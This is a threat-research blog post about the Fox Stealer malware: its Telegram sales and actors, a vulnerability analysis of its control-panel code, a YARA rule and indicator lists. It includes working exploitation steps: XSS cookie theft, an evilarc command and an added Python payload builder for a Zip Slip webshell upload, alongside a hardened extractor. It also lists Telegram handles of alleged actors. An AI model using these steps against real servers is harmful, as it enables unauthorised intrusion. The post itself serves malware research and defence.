Threat: Fox Stealer, the Russian Telegram skid army



About a month ago my crawler found what seemed to be a command & control panel that I had never seen before. After researching it I couldn't find any information about it, and it seemed different from other fox-themed malware such as Diamond Fox or Pony Forx. I had questions such as: where does this come from? Where is it sold? What does it do?
This article covers my findings and the answers to all of the above.
I haven't analyzed the binary since I'm not really interested in knowing how it does what I already know it does. But if that's your jam you'll find some hashes at the end of this article.

After finding the first panel I tailored my crawler to look for similar panels. I quickly realized there were two versions going around: one had a blue theme and the other one was orange. The orange version seemed a bit more elaborate:



The orange version displays a screenshot and AutoFill data


In the Settings page we can see some differences:

The orange version has a few more features:
  • NoSNG
  • WebCam capture
  • Max file size



After a bit of OSINT I found the source code of both panels.
The blue version was called panel_v0_1.zip and the orange version panelv0_2.zip. Note that there is also a Russian version going around which has hardcoded Russian strings.

Communication channel

Sales of this malware started on January 29 on the lolzteam forum in the "private software" category (hxxps://lolzteam.net/threads/784753/).
Price: 600 rubles, 200 rubles for "rebinding".
On April 15 the actor closed the sales on lolzteam:



They operate mostly through Telegram in an invite-only group.
Favorite activities include bragging about getting victims' pictures from their webcams, posting memes and anime girls.

Actor "Phust" bragging about getting a victim's webcam picture


Some actors aren't shy at all and don't hesitate to post voice messages. Here's your classic "blyad" voice message:


What does the fox say?




There is no typical builder for this, which is a trend I'm seeing more and more these days. Instead, each client has access to a private Telegram bot from which they can generate new builds and receive logs from victims:




And finally there is a third channel, created by actor @foo0x, that regularly posts updates about the product.
These are all the telegra.ph links posted in this channel:

Clients are asked to use http://enothost.ru for hosting, which definitely looks like a fishy hosting provider...

One actor got compromised by a lousy hacker, found a PHP webshell on his web server and asked on Telegram "Это кино такое?", which translates to "is this a movie?". Eventually someone told him it was a shell...




Two hours later an update was published to mitigate the vulnerability:


Source Code Analysis (Server Side)

While analyzing the source code it was clear there were some obvious cross-site scripting vulnerabilities: the victim's input is reflected with no validation on either the client or the server side. That would allow an attacker to steal the actor's cookies while he is logged into the C2, simply by crafting an XSS payload and sending it to the C2 as if it were stolen data.

Most importantly, there was also no validation when receiving the zip file containing the stolen data from the victim. If an attacker sends a zip file containing a bunch of files to the panel on post.php, it will be unzipped and stored in the web server directory like this: foxc2.tld/logs/randomID/attackerFiles.
This is the code responsible for this:


if(isset($_POST['upload']))
{
 if(isset($_FILES))
 {
  if($_FILES['files']['error'] > 0)
   $err[] = $errUpload[$_FILES['files']['error']];

  if(empty($err))
  {
   // Only the PHP upload status is checked; the archive itself is never inspected
   $randint = mt_rand(100000000,999999999);
   $type = pathinfo($_FILES['files']['name']);   // computed but not used in the lines shown
   mkdir("logs/".$randint,0777);                 // world-writable directory under the web root
   $name = "/logs/".$randint."/".$randint.".zip";
   move_uploaded_file($_FILES['files']['tmp_name'], __DIR__ . $name);
   require_once('pclzip.lib.php');
   $archive = new PclZip("logs/".$randint."/".$randint.".zip");
   // Entry names are used as-is, so a "../" component escapes logs/$randint/ (Zip Slip)
   $archive->extract(PCLZIP_OPT_PATH, "logs/".$randint."/");

...

By the look of this, an attacker can upload a PHP webshell there.
The problem is that the shell will be located in logs/randomID and there's no way to know this ID unless you are already logged into the panel and are looking at the browser console, or have access to the database...
Fortunately, the library used for unzipping the file is vulnerable to Zip Slip. Basically what needs to be done is creating a zip file with an entry whose name starts with a ".." directory component, followed by the PHP shell.
When the zip file is unzipped, the ".." is interpreted, so the shell climbs back one directory and lands in /logs instead of /logs/randID.
You can generate such a payload using the evilarc tool like this:


python2 evilarc.py -f out.zip -d 1 -o unix payload.php

For a stealthier payload it's a good idea to fill the zip file with "legit" data such as a screenshot, a password list, etc. Making a request to post.php with the right parameters will create a new row in the panel (and send the data over Telegram if that setting is enabled).
A proper zip payload would look like this:



Voilà ¯\_(ツ)_/¯: after sending the zip through a form on post.php, the webshell will be located at c2.com/logs/shell.php (only do this on localhost, of course).
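To make the Zip Slip step concrete, here is an added Python example (not part of the original post, and not evilarc's or the panel's code). It builds the same kind of archive with the standard zipfile module, then extracts it twice into a temporary directory standing in for logs/<randint>/: once the way a traversal-unaware extractor does, and once with a path check that refuses entries resolving outside the target directory. The file names, their contents and the 9-digit directory name are constructed stand-ins, and the "shell" is a harmless placeholder.

```python
import io
import os
import tempfile
import zipfile

# Constructed stand-ins for the "legit" log files a real build would upload.
LEGIT_FILES = {
    "Password.txt": b"example.test\tvictim\thunter2\n",
    "screenshot.jpeg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,  # fake JPEG header
}
# Harmless placeholder standing in for a webshell body.
SHELL_BODY = b"<?php echo 'placeholder'; ?>\n"


def build_zipslip_payload(shell_name="shell.php", depth=1):
    """Return the bytes of a zip holding the decoy files plus one entry whose
    name climbs `depth` directories (what evilarc's -d option produces)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in LEGIT_FILES.items():
            zf.writestr(name, data)
        zf.writestr("../" * depth + shell_name, SHELL_BODY)  # the traversal entry
    return buf.getvalue()


def entry_names(zip_bytes):
    """Entry names exactly as stored in the archive (no normalisation)."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.namelist()


def naive_extract(zip_bytes, dest):
    """Vulnerable extractor: joins each entry name onto dest without looking
    at it, which is what a traversal-unaware library does. Returns the
    normalised paths it wrote."""
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest, info.filename)  # "../" is kept as-is
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(os.path.normpath(target))
    return written


def safe_extract(zip_bytes, dest):
    """Hardened extractor: resolve the target and refuse anything that does not
    stay under dest. Raises ValueError on the first offending entry."""
    dest_real = os.path.realpath(dest)
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            if os.path.commonpath([dest_real, target]) != dest_real:
                raise ValueError(f"Zip Slip entry rejected: {info.filename!r}")
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(target)
    return written


def demo():
    """Simulate logs/<randint>/ under a temp dir. Returns
    (naive extraction dropped shell.php into logs/, safe extraction refused it)."""
    payload = build_zipslip_payload()
    with tempfile.TemporaryDirectory() as root:
        logs = os.path.join(root, "logs")
        rand_dir = os.path.join(logs, "123456789")  # stands in for mt_rand()
        os.makedirs(rand_dir)
        naive_extract(payload, rand_dir)
        escaped = os.path.isfile(os.path.join(logs, "shell.php"))
        refused = False
        try:
            safe_extract(payload, rand_dir)
        except ValueError:
            refused = True
    return escaped, refused


if __name__ == "__main__":
    escaped, refused = demo()
    print("naive extractor wrote logs/shell.php:", escaped)
    print("path-checked extractor refused the entry:", refused)
```

Python's own ZipFile.extractall strips ".." components before writing, which is why naive_extract joins the stored names by hand: that is the behaviour of an extractor that trusts entry names, and it is the behaviour the path check in safe_extract (realpath plus a commonpath comparison against the destination) is there to stop.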

As I mentioned earlier, two weeks ago a patch was released to mitigate the vulnerabilities. Here's what changed in the code.
They are now using regular expressions to validate the POST parameters:

if(!preg_match("#^[aA-zZ0-9\-_]+$#",$_POST['p']))
    $_POST['p'] = 0;
if(!preg_match("#^[aA-zZ0-9\-_]+$#",$_POST['c']))
    $_POST['c'] = 0;
if(!preg_match("#^[aA-zZ0-9\-_]+$#",$_POST['f']))
    $_POST['f'] = 0;
if(!preg_match("#^[aA-zZ0-9\-_]+$#",$_POST['a']))
    $_POST['a'] = 0;
if(!preg_match("#^[aA-zZ0-9\-_]+$#",$_POST['b']))
    $_POST['b'] = 0;

Note that this character class is looser than it looks: the range A-z also covers the ASCII codes between Z and a, so [, \, ], ^ and ` are accepted in addition to letters, digits, - and _, and since the pattern has no D modifier, $ also matches before a trailing newline. Whether that matters depends on how the parameters are used afterwards, which this snippet doesn't show.

And most importantly they are now using the PCLZIP_OPT_BY_NAME argument, which only allows files to be extracted if their names are known to the server...

$files_ext[0] = "Password.txt";
$files_ext[1] = "screenshot.jpeg";
$archive->extract(PCLZIP_OPT_BY_NAME, $files_ext,PCLZIP_OPT_PATH,"logs/".$randint."/");

( ͡° ͜ʖ ͡°)
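As an added example (not part of the original post or the panel's code), the following Python mirrors the patched preg_match check exactly, using re.match rather than re.fullmatch so that $ behaves as PCRE's does without the D modifier, and enumerates which printable characters the class admits beyond the obvious ones. It is an audit helper for the regex as shown, nothing more.

```python
import re
import string

# The panel's check, as shown in the patched post.php:
#   preg_match("#^[aA-zZ0-9\-_]+$#", $_POST['p'])
# Python's re gives the same character-class and $ semantics for this pattern,
# so re.match (not fullmatch) reproduces PCRE without the D modifier.
FOX_PARAM_RE = re.compile(r"^[aA-zZ0-9\-_]+$")

# What the author of the regex presumably intended to allow.
INTENDED = set(string.ascii_letters + string.digits + "-_")


def fox_param_ok(value):
    """True if the panel's regex would accept `value` as a POST parameter."""
    return FOX_PARAM_RE.match(value) is not None


def unexpected_chars():
    """Printable ASCII characters the regex admits beyond letters, digits,
    '-' and '_'. They come from the A-z range, which spans the ASCII codes
    sitting between 'Z' and 'a'."""
    return {c for c in string.printable if fox_param_ok(c) and c not in INTENDED}


def trailing_newline_slips(value="abc"):
    """Without the D modifier, $ also matches just before a final newline,
    so a value with a trailing newline passes the check."""
    return fox_param_ok(value + "\n")


if __name__ == "__main__":
    print("extra characters admitted:", sorted(unexpected_chars()))
    print("'abc\\n' passes:", trailing_newline_slips())
```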

YARA rule:
rule Fox_Stealer
{
    meta:
        description = "Fox_Stealer"
        author = "MisterCh0c"
        reference = "c6ab8c6b8c56b4d79372f00d6b2db0bcd2d0d7dfaaca577fcfbc1b3dec1a5d57"
        date = "2019/04"
        maltype = "Stealer"
 
    strings:
        $string1 = "cn=%s&b=%s&d=%s&dis=%s&t=%s&f=%s&bss=%s&s=%s&i=%s&scr=%s&avm=%s&aav=%s&ar=%s&lod=%s&sc=%s&ns=%s&ms=%s&form=%s"
 
    condition:
        uint16(0) == 0x5A4D and all of ($string*)
}


Bonus:
A custom panel stands out by its design:
hxxp://battlecash.ru
424a0c1df47c6b72849a2a57cdd30d501bb9badfe4f6e38f713799094933e030
d5ccebd39913649d505cd3efc7ba4c1aa8597c8fddf5fdaaf08ea2a91c5792a6





Intelligence / IOC

Description: Panel_v0_1.zip
MD5: ebcf2dcd7a462f46b984b7d79407838f
SHA-1: e4c3fe115566edd81de1f2cc1cdfa11ac554a0e8
Size: 3.82 MB
File Type: ZIP

Description: Panel_v0_2.zip
MD5: de8c30181fd26d0f1f9a8f803244b2dd
SHA-1: aa6690f954732a650c81c29b0cec9d5ff30ff46a
SHA-256: 940d516d887d64e73358bb6e2708695280c21076e500627bec785fda99aae73d
Size: 3.86 MB
File Type: ZIP

Description: Fixed Post.php
MD5: a377f87b9471e77b84a0045970b5bb85
SHA-1: c22f68099e8bfe6d95e353ab2e551eec78afeb43
SHA-256: 78e5eb48acbd03ff64c99011f66c0ce7b7cd5b8d6c61277787aded817f303efd
Size: 3.44 KB
File Type: PHP



Bins:

Panels (47)

  • hxxp://a0287829.xsph.ru
  • hxxp://androsha.ga
  • hxxp://anticap.ml
  • hxxp://ark-steal-free.tk
  • hxxp://battlecash.ru
  • hxxp://blackspace.site
  • hxxp://bigbosslike.tk/
  • hxxp://bloodborn.xyz
  • hxxp://bugtrackerjorkey.tk
  • hxxp://coderxz.site
  • hxxp://dexire.tk
  • hxxp://djimbosfan.tk
  • hxxp://docheat.site
  • hxxp://exchangepe.cf
  • hxxp://f0289264.xsph.ru
  • hxxp://foxpanel734923vbb2.tk
  • hxxp://gilork.ga
  • hxxp://govoting.site
  • hxxp://hjon1k21.tk
  • hxxp://hooksixteenth.tk
  • hxxp://jon1k2002.tk
  • hxxp://kuzya001.tk
  • hxxp://lexonlex31q.tk/login/
  • hxxp://lobsterkiller.tk
  • hxxp://lucasik.tk
  • hxxp://mrgrom.gq
  • hxxp://oldfuck.tk/login/
  • hxxp://orangemail.tk
  • hxxp://paketa.gq
  • hxxp://panelys.tk
  • hxxp://phust-adminpanel.ga
  • hxxp://poolground.tk
  • hxxp://reaper.tk
  • hxxp://rondylog1337.ga
  • hxxp://sashajeweler.tk
  • hxxp://schoolmosreg.tk
  • hxxp://squarez.icu
  • hxxp://squarez16.site
  • hxxp://stiller.tk
  • hxxp://test1331.tk
  • hxxp://webenginer.tk
  • hxxp://wnukz.site
  • hxxp://wsq22.ml
  • hxxp://yadaynksta.ga
  • hxxp://younglybae.tk
  • hxxp://younglybae.tk/login
  • hxxp://z1xrk.cf

Telegram (69)

Group:Fox Chat
  • @ANDROSHAyt
  • @Accacinka
  • @AntonioDeSpasito
  • @CopyRRR
  • @DarkVolk
  • @Echout
  • @Elecktro1337
  • @GgW000
  • @Hina9168
  • @Jon1k02
  • @LexQ31
  • @Ny_Ya
  • @Phust
  • @RiotExcuse
  • @SoX13
  • @SquarezLZT
  • @TBOU_KPUK
  • @Tchase
  • @TomAndersn
  • @VainbergVip
  • @VenerGG
  • @XPAKETAX
  • @aI1n04ka
  • @ak47andmannayakawa
  • @aliksiq
  • @allworm
  • @ampleev
  • @an1ik
  • @andrewcrazy
  • @andygars1a
  • @bagukan
  • @blood_borrn
  • @coldsteeze
  • @contello
  • @djimbosfan
  • @duffyrock
  • @dzeroz
  • @elecspaghett
  • @embley
  • @ernestop
  • @foo0x
  • @fortstoreoperator
  • @fristaylo
  • @fsbagent
  • @fyddi
  • @gen_aAAA
  • @glor123
  • @grifon314
  • @hopelessfuture
  • @invaiter
  • @itzlonique
  • @john_white7
  • @king10tts
  • @lomlock
  • @masusdez
  • @mrgromxyz
  • @neyklyzhiy
  • @staszon
  • @terratomorff
  • @thispills4me
  • @timoha2281337
  • @tot_samii_4el
  • @tropa72rus
  • @under_krypton1
  • @volfdem
  • @wipz_I
  • @wsq22
  • @xboom
  • @zaqqqqs

